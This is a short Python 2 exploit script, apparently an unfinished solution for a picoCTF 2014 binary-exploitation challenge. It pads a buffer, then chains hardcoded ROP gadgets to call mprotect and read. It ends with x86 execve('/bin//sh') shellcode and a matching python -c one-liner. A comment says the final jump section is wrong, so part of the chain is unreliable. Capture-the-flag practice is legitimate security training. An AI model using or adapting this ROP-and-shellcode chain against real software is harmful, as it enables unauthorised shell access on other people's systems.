Untitled

#!/usr/bin/python
import struct
import socket
import telnetlib

def pack4(v):
    """
    Takes a 32 bit integer and returns a 4 byte string representing the
    number in little endian.
    """
    assert 0 <= v <= 0xffffffff
    # The < is for little endian, the I is for a 4 byte unsigned int.
    # See https://docs.python.org/2/library/struct.html for more info.
    return struct.pack('<I', v)

def unpack4(v):
    """Does the opposite of pack4."""
    assert len(v) == 4
    return struct.unpack('<I', v)[0]

#s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('vuln2014.picoctf.com', 4548))
#s.connect(('127.0.0.7', 1337))
#f = s.makefile('rw', bufsize=0)

# It's useful to pause the client right after connecting so that you can
# attach to the server with gdb if desired.
#raw_input()

JUSTRET = pack4(0xf000840)
PUSHEBX = pack4(0xf00083f)
POPEAX  = pack4(0xf000d25)
POPEBX  = pack4(0xf0010a4)
POPECX  = pack4(0xf001985)
POPEDX  = pack4(0xf00107f)
INT80   = pack4(0xf0030fa)

buf =  "\x1e\x00\x00\x00\n" # Seed = 0x1e
#f.write(buf)

# Call mprotect
buf += "a" * 31
buf += POPEBX
buf += pack4(0x0f000000)
buf += POPECX
buf += pack4(0xa000)
buf += POPEDX
buf += "\x07\x00\x00\x00"
buf += POPEAX
buf += pack4(0x7d)
buf += INT80

# Call read on our 0x0f000000 buffer
buf += POPEAX
buf += pack4(0x3)
buf += POPEBX
buf += pack4(0x0)
buf += POPECX
buf += pack4(0x0f000000)
buf += POPEDX
buf += pack4(21) # 21 bytes shellcode
buf += INT80


# WRONG AFTER THIS!!!

buf += POPEBX
buf += pack4(0x0f000000)
buf += PUSHEBX
buf += JUSTRET
buf += "\n"

buf += "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"

#f.write(buf)
print buf
'''
t = telnetlib.Telnet()
t.sock = s
t.interact()

python -c 'print "\x1e\x00\x00\x00\n" + "a"*31 + "\xa4\x10\x00\x0f" + "\x00\x00\x00\x0f" + "\x85\x19\x00\x0f" + "\x00\xa0\x00\x00" + "\x7f\x10\x00\x0f" + "\x07\x00\x00\x00" + "\x25\x0d\x00\x0f" + "\x7d\x00\x00\x00" + "\xfa\x30\x00\x0f" > input
'''